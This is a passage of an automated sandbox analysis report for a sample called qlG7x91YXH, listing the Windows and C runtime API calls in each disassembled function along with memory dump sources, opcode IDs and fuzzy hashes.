                                              • Instruction ID: 71d895031068f903d595d52ccbe9e0e405070f5aab6a60973bc8370a7fc49197
                                              • Opcode Fuzzy Hash: c7943b6784f77c082118c22a62b304742eeadcec8b23e7a10f1a42d3dbd2f190
                                              • Instruction Fuzzy Hash: A80162F69002087FEB109BE49D89EE7766CE708701F544592B746F2081E6759EC88F74
                                              APIs
                                              • InterlockedExchange.KERNEL32(00FBCAD8,00FBCAD8), ref: 00DE097B
                                              • RtlEnterCriticalSection.NTDLL(00FBCAB8), ref: 00DE098D
                                              • TerminateThread.KERNEL32(00FBA5C0,000001F6), ref: 00DE099B
                                              • WaitForSingleObject.KERNEL32(00FBA5C0,000003E8), ref: 00DE09A9
                                              • CloseHandle.KERNEL32(00FBA5C0), ref: 00DE09B8
                                              • InterlockedExchange.KERNEL32(00FBCAD8,000001F6), ref: 00DE09C8
                                              • RtlLeaveCriticalSection.NTDLL(00FBCAB8), ref: 00DE09CF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: de351f3a7ff8477da43809580db704f814460388e806935ac4dfc00edc5c0650
                                              • Instruction ID: b3eb706199c93ddc0a8a2d4dd17bee8c3ea4c99d239ddd81260ad50d609a5cb0
                                              • Opcode Fuzzy Hash: de351f3a7ff8477da43809580db704f814460388e806935ac4dfc00edc5c0650
                                              • Instruction Fuzzy Hash: D2F0CD31442912AFD7516F95EE89AD67A35BF05702F541215F10160CB1C77694E9CFA0
                                              APIs
                                              • __allrem.LIBCMT ref: 00DA00BA
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA00D6
                                              • __allrem.LIBCMT ref: 00DA00ED
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA010B
                                              • __allrem.LIBCMT ref: 00DA0122
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA0140
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                              • Instruction ID: ac6263d317d888dacc10d57f9d52b2beb2995abadbf03f4b3b3552418955af1d
                                              • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                              • Instruction Fuzzy Hash: D981F672A00B069BEB209F68CC41BAB77E9EF46334F28453AF551D7281E770D9058BB4
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D982D9,00D982D9,?,?,?,00DA644F,00000001,00000001,8BE85006), ref: 00DA6258
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DA644F,00000001,00000001,8BE85006,?,?,?), ref: 00DA62DE
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DA63D8
                                              • __freea.LIBCMT ref: 00DA63E5
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              • __freea.LIBCMT ref: 00DA63EE
                                              • __freea.LIBCMT ref: 00DA6413
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 4ee4e1a26317ce3aa8f43a10b5215028badd9d1cfb0e565f05a0b9c40256b3c3
                                              • Instruction ID: 779bdfb478266bb6f985b2d2693505f336785502977ad7981ad9205f325869bd
                                              • Opcode Fuzzy Hash: 4ee4e1a26317ce3aa8f43a10b5215028badd9d1cfb0e565f05a0b9c40256b3c3
                                              • Instruction Fuzzy Hash: E951AE72A00216EFDF259F64CC81EAF7AAAEF46750F1D4629F805D6180EB34DC45C6B0
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFBCCA
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBD25
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFBD6A
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DFBD99
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DFBDF3
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFBDFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                              • String ID:
                                              • API String ID: 1120388591-0
                                              • Opcode ID: f560ad287dd6d99689fe7b7834eaeeb9a10169b5e557e4bf79bc3e485f966101
                                              • Instruction ID: 8dccc435ba079524d7a55774acbc51c962b7b35efa9b806534c58278ef0dc84b
                                              • Opcode Fuzzy Hash: f560ad287dd6d99689fe7b7834eaeeb9a10169b5e557e4bf79bc3e485f966101
                                              • Instruction Fuzzy Hash: 4F81B030108245EFD714DF24C891E2ABBE5FF84318F19855DF59A4B2A2DB32ED45CBA2
                                              APIs
                                              • VariantInit.OLEAUT32(00000035), ref: 00DCF7B9
                                              • SysAllocString.OLEAUT32(00000001), ref: 00DCF860
                                              • VariantCopy.OLEAUT32(00DCFA64,00000000), ref: 00DCF889
                                              • VariantClear.OLEAUT32(00DCFA64), ref: 00DCF8AD
                                              • VariantCopy.OLEAUT32(00DCFA64,00000000), ref: 00DCF8B1
                                              • VariantClear.OLEAUT32(?), ref: 00DCF8BB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCopy$AllocInitString
                                              • String ID:
                                              • API String ID: 3859894641-0
                                              • Opcode ID: 76df03264dad599e4ea50156f664b9773bf59c42ac17d49c6c4dce7d7e5d48ca
                                              • Instruction ID: 746479a0237a8239928421fa75a133d29ae9b97f9fb50b671fc6bc4f9a7c5d8b
                                              • Opcode Fuzzy Hash: 76df03264dad599e4ea50156f664b9773bf59c42ac17d49c6c4dce7d7e5d48ca
                                              • Instruction Fuzzy Hash: A651B536600312ABCF14AB65D895FADB3A6EF45710B24946BE905DF291EB708C40CB77
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • BeginPaint.USER32(?,?,?), ref: 00D89241
                                              • GetWindowRect.USER32(?,?), ref: 00D892A5
                                              • ScreenToClient.USER32(?,?), ref: 00D892C2
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D892D3
                                              • EndPaint.USER32(?,?,?,?,?), ref: 00D89321
                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DC71EA
                                                • Part of subcall function 00D89339: BeginPath.GDI32(00000000), ref: 00D89357
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                              • String ID:
                                              • API String ID: 3050599898-0
                                              • Opcode ID: adbe86395c86f322798b89b2cd4db9a76c588cf057678db3b0b3080f9f3d6d44
                                              • Instruction ID: 22d01d9f8551664848b1305a69dc46cd4a44b124e52b38462c33e141ed6c79d8
                                              • Opcode Fuzzy Hash: adbe86395c86f322798b89b2cd4db9a76c588cf057678db3b0b3080f9f3d6d44
                                              • Instruction Fuzzy Hash: E041B330104301AFDB11EF65DC94FBABBB8EB86720F180269FA94971E1C7719889DB71
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DE080C
                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DE0847
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00DE0863
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00DE08DC
                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DE08F3
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DE0921
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3368777196-0
                                              • Opcode ID: aed8af1d3425c1aa35f3a7c37f905d7cd2255409cc522fd0ac671b38d79acb37
                                              • Instruction ID: 38a3603841402cd3e1932856f62947703bad040e5ce7a5c3896e461f77ce0778
                                              • Opcode Fuzzy Hash: aed8af1d3425c1aa35f3a7c37f905d7cd2255409cc522fd0ac671b38d79acb37
                                              • Instruction Fuzzy Hash: 8D415771900205EFDF15AF55DC85AAA7BB8FF44300F1480A5F900AA297DB71DEA4DBB0
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DCF3AB,00000000,?,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00E0824C
                                              • EnableWindow.USER32(00000000,00000000), ref: 00E08272
                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E082D1
                                              • ShowWindow.USER32(00000000,00000004), ref: 00E082E5
                                              • EnableWindow.USER32(00000000,00000001), ref: 00E0830B
                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E0832F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 62e11c6af4d575613fba72ae4146726b561f8e250ac60e2a3a73b0a25dffb904
                                              • Instruction ID: a7e9377f2cd587d0197950609abd8f5557b514376beab5a8328bd9a599b92c8e
                                              • Opcode Fuzzy Hash: 62e11c6af4d575613fba72ae4146726b561f8e250ac60e2a3a73b0a25dffb904
                                              • Instruction Fuzzy Hash: B741DA34601644DFDF11CF15C999BE47BE0FB4A718F1822A5E6886B1F2C73258C5CB41
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00DD4C95
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DD4CB2
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DD4CEA
                                              • _wcslen.LIBCMT ref: 00DD4D08
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DD4D10
                                              • _wcsstr.LIBVCRUNTIME ref: 00DD4D1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                              • String ID:
                                              • API String ID: 72514467-0
                                              • Opcode ID: ac0d27aaf0d7602e9769feac8b2a7de65b8ebc39bfb462b6261908c3779cf50a
                                              • Instruction ID: cc617a11b6e4550193d05ae6c9283f4bc5b66b903f7fa728ddd1d17cdf42c1e2
                                              • Opcode Fuzzy Hash: ac0d27aaf0d7602e9769feac8b2a7de65b8ebc39bfb462b6261908c3779cf50a
                                              • Instruction Fuzzy Hash: B621F931204204BFEB255B39EC49E7B7B9DDF45B50F14412AF805DA291DE72DC4197B1
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                              • _wcslen.LIBCMT ref: 00DE587B
                                              • CoInitialize.OLE32(00000000), ref: 00DE5995
                                              • CoCreateInstance.COMBASE(00E0FCF8,00000000,00000001,00E0FB68,?), ref: 00DE59AE
                                              • CoUninitialize.COMBASE ref: 00DE59CC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 3172280962-24824748
                                              • Opcode ID: 22b05d08bf43d867f56f5ca1f90f4fc707575a25d757499aebb3ea4ef0c691b1
                                              • Instruction ID: 38a7f70673d3b20e284d996773314212638b5549e2aa8a2fc0c05c7384e07d75
                                              • Opcode Fuzzy Hash: 22b05d08bf43d867f56f5ca1f90f4fc707575a25d757499aebb3ea4ef0c691b1
                                              • Instruction Fuzzy Hash: 6ED175716047019FC714EF26D880A2ABBE1EF89758F14895DF8899B362D731EC45CFA2
                                              APIs
                                                • Part of subcall function 00DD0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0FCA
                                                • Part of subcall function 00DD0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0FD6
                                                • Part of subcall function 00DD0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0FE5
                                                • Part of subcall function 00DD0FB4: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DD0FEC
                                                • Part of subcall function 00DD0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD1002
                                              • GetLengthSid.ADVAPI32(?,00000000,00DD1335), ref: 00DD17AE
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DD17BA
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DD17C1
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00DD17DA
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00DD1335), ref: 00DD17EE
                                              • HeapFree.KERNEL32(00000000), ref: 00DD17F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 169236558-0
                                              • Opcode ID: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                              • Instruction ID: baf8d7e0b0bbbc38d2309f2b037133dde22edb1eb5d122591e403db4d5f86228
                                              • Opcode Fuzzy Hash: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                              • Instruction Fuzzy Hash: 90117C75601205FFDB109FA5CC49BAE7BB9FB45355F24421AF481A7220D736A988CB70
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00D93379,00D92FE5), ref: 00D93390
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9339E
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D933B7
                                              • SetLastError.KERNEL32(00000000,?,00D93379,00D92FE5), ref: 00D93409
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 726350618c2c5f11650954c331d7a2549e306487fcc37f65d51853f20e2a63e6
                                              • Instruction ID: 43ae81f2371c4542fc3c72ad8125d5c1bd25deb6f28c2edbd793fedeb26426f1
                                              • Opcode Fuzzy Hash: 726350618c2c5f11650954c331d7a2549e306487fcc37f65d51853f20e2a63e6
                                              • Instruction Fuzzy Hash: 5901243224D311BFEF2827BABC899272E94EB05779B300329F410A11F0EF128D0A5A74
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00DA5686,00DB3CD6,?,00000000,?,00DA5B6A,?,?,?,?,?,00D9E6D1,?,00E38A48), ref: 00DA2D78
                                              • _free.LIBCMT ref: 00DA2DAB
                                              • _free.LIBCMT ref: 00DA2DD3
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00D9E6D1,?,00E38A48,00000010,00D74F4A,?,?,00000000,00DB3CD6), ref: 00DA2DE0
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00D9E6D1,?,00E38A48,00000010,00D74F4A,?,?,00000000,00DB3CD6), ref: 00DA2DEC
                                              • _abort.LIBCMT ref: 00DA2DF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 3df4f85c04d7d4e65a4bdc1514c2bf267b75b4f69f417b469adef6695baaef56
                                              • Instruction ID: 2ef9aa1db82140edff1007adfe5a1eee8c52e4a448445fe4fe0d366460a2a726
                                              • Opcode Fuzzy Hash: 3df4f85c04d7d4e65a4bdc1514c2bf267b75b4f69f417b469adef6695baaef56
                                              • Instruction Fuzzy Hash: F3F049355456006BCA62273F7C0AB7B1656EFC3771B354514F424A2197EF29CC4551B1
                                              APIs
                                                • Part of subcall function 00D89639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896A2
                                                • Part of subcall function 00D89639: BeginPath.GDI32(?), ref: 00D896B9
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E08A4E
                                              • LineTo.GDI32(?,00000003,00000000), ref: 00E08A62
                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E08A70
